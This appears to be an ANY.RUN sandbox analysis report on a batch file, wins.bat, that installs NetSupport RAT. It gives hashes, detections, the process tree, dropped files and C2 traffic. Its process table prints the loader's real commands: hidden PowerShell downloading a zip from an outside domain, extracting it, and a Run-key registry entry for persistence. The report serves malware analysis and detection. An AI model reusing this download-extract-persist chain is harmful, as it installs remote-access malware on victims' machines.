File name:

wins.bat

Full analysis: https://app.any.run/tasks/7afd3ccb-d6bd-41b5-9f74-b009b8ef9e90
Verdict: Malicious activity
Threats:

NetSupport RAT is a malicious adaptation of the legitimate NetSupport Manager, a remote access tool used for IT support, which cybercriminals exploit to gain unauthorized control over systems. It has gained significant traction due to its sophisticated evasion techniques, widespread distribution campaigns, and the challenge it poses to security professionals who must distinguish between legitimate and malicious uses of the underlying software.

Malware Trends Tracker     >>>
Analysis date: May 19, 2025, 20:47:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
netsupport
rmm-tool
remote
auto
arch-exec
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (32437), with CRLF line terminators
MD5:

DD7C70B743BACEF2696251215857DEAE

SHA1:

6FA36C7446A441168A0E1878E38D04455C0C3B36

SHA256:

4DAF897E45D404954840AE06656587920F74AEDB5F3F721D69D3477E0DCCBF78

SSDEEP:

1536:etK4A8midgcB7TztK4A8midgcB7T3tK4A8midgcB7THf:etK4A8midgcB7TztK4A8midgcB7T3tKO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7620)
      • powershell.exe (PID: 6300)

    • NETSUPPORT has been found (auto)

      • powershell.exe (PID: 7620)
      • powershell.exe (PID: 6300)

    • Changes the autorun value in the registry

      • reg.exe (PID: 7744)

    • NETSUPPORT mutex has been found

      • client32.exe (PID: 7736)

    • NETSUPPORT has been detected (SURICATA)

      • client32.exe (PID: 7736)

    • Connects to the CnC server

      • client32.exe (PID: 7736)

  • SUSPICIOUS

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 6300)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 6300)
      • powershell.exe (PID: 7620)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 7620)
      • powershell.exe (PID: 6300)

    • The executable file from the user directory is run by the CMD process

      • client32.exe (PID: 7736)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6480)

    • Drop NetSupport executable file

      • powershell.exe (PID: 6300)
      • powershell.exe (PID: 7620)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6480)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7620)

    • Connects to the server without a host name

      • client32.exe (PID: 7736)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7620)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 6300)

    • The sample compiled with english language support

      • powershell.exe (PID: 7620)
      • powershell.exe (PID: 6300)

    • Disables trace logs

      • powershell.exe (PID: 6300)

    • Checks supported languages

      • client32.exe (PID: 7736)

    • Reads the computer name

      • client32.exe (PID: 7736)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
8
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs #NETSUPPORT powershell.exe sppextcomobj.exe no specs slui.exe no specs #NETSUPPORT powershell.exe #NETSUPPORT client32.exe reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
2432\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6300powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://upgradegc.com/rsrs.zip?caf6ab4e8150f95843e5' -OutFile 'C:\Users\admin\AppData\Roaming\Applica.zip'" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6480C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\wins.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
7264C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7296"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7620powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\admin\AppData\Roaming\Applica.zip', 'C:\Users\admin\AppData\Roaming\Option')"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7736"C:\Users\admin\AppData\Roaming\Option\client32.exe" C:\Users\admin\AppData\Roaming\Option\client32.exe
cmd.exe
User:
admin
Company:
NetSupport Ltd
Integrity Level:
MEDIUM
Description:
NetSupport Client Application
Version:
V14.10
Modules
Images
c:\users\admin\appdata\roaming\option\client32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\users\admin\appdata\roaming\option\pcicl32.dll
7744reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Option\client32.exe" /fC:\Windows\System32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
Total events
9 601
Read events
9 600
Write events
1
Delete events
0

Modification events

(PID) Process:(7744) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Support11
Value:
C:\Users\admin\AppData\Roaming\Option\client32.exe
Executable files
14
Suspicious files
4
Text files
11
Unknown types
1

Dropped files

PID
Process
Filename
Type
6300powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:4FE1FEA92CC56D73490ADC8E433FF986
SHA256:EEFB9BC9570C52ACF9EDD4CC9C380D6126FB8718F4DC802A61A5C2BE642CAF50
6300powershell.exeC:\Users\admin\AppData\Roaming\Applica.zipcompressed
MD5:D2210057441E8698985C25B2270BA64C
SHA256:CF01FDE2AC2B232EB4ADD8D9E4E36C4150D9AF46EBAC925490FFE9F2E8A85FC1
7620powershell.exeC:\Users\admin\AppData\Roaming\Option\NSM.LICtext
MD5:390C964070626A64888D385C514F568E
SHA256:AD0D05305FDEB3736C1E8D49C3A6746073D27B4703EB6DE6589BDC4AA72D7B54
7620powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_eqc4renj.kul.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7620powershell.exeC:\Users\admin\AppData\Roaming\Option\NSM.inibinary
MD5:88B1DAB8F4FD1AE879685995C90BD902
SHA256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
7620powershell.exeC:\Users\admin\AppData\Roaming\Option\PCICHEK.DLLexecutable
MD5:A0B9388C5F18E27266A31F8C5765B263
SHA256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
6300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1hnnac44.25s.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7620powershell.exeC:\Users\admin\AppData\Roaming\Option\PCICL32.DLLexecutable
MD5:00587238D16012152C2E951A087F2CC9
SHA256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
7620powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tzjkkovt.uk4.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7620powershell.exeC:\Users\admin\AppData\Roaming\Option\msvcr100.dllexecutable
MD5:0E37FBFA79D349D672456923EC5FBBE3
SHA256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
22
DNS requests
16
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.192:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7736
client32.exe
POST
200
94.158.245.118:443
http://94.158.245.118/fakeurl.htm
unknown
malicious
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7736
client32.exe
POST
94.158.245.118:443
http://94.158.245.118/fakeurl.htm
unknown
malicious
8152
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7736
client32.exe
POST
94.158.245.118:443
http://94.158.245.118/fakeurl.htm
unknown
malicious
8152
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7736
client32.exe
POST
200
94.158.245.118:443
http://94.158.245.118/fakeurl.htm
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.192:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
6300
powershell.exe
160.153.0.251:443
upgradegc.com
Host Europe GmbH
NL
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.48.23.192
  • 23.48.23.193
  • 23.48.23.178
  • 23.48.23.188
  • 23.48.23.189
  • 23.48.23.182
  • 23.48.23.181
  • 23.48.23.194
  • 23.48.23.132
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
google.com
  • 216.58.212.174
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.66
  • 40.126.32.76
  • 20.190.160.132
  • 40.126.32.136
  • 20.190.160.4
  • 20.190.160.128
  • 40.126.32.134
  • 20.190.160.64
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
upgradegc.com
  • 160.153.0.251
unknown
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted

Threats

PID
Process
Class
Message
7736
client32.exe
Potentially Bad Traffic
ET INFO HTTP traffic on port 443 (POST)
7736
client32.exe
Potentially Bad Traffic
ET INFO HTTP traffic on port 443 (POST)
7736
client32.exe
Misc activity
ET REMOTE_ACCESS NetSupport Remote Admin Response
7736
client32.exe
A Network Trojan was detected
REMOTE [ANY.RUN] NetSupport RAT
7736
client32.exe
A Network Trojan was detected
REMOTE [ANY.RUN] NetSupport RAT
7736
client32.exe
Misc activity
ET REMOTE_ACCESS NetSupport Remote Admin Checkin
7736
client32.exe
Misc activity
ET REMOTE_ACCESS NetSupport Remote Admin Checkin
7736
client32.exe
Misc activity
ET REMOTE_ACCESS NetSupport Remote Admin Response
7736
client32.exe
Potentially Bad Traffic
ET INFO HTTP traffic on port 443 (POST)
7736
client32.exe
A Network Trojan was detected
REMOTE [ANY.RUN] NetSupport RAT
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
wins.bat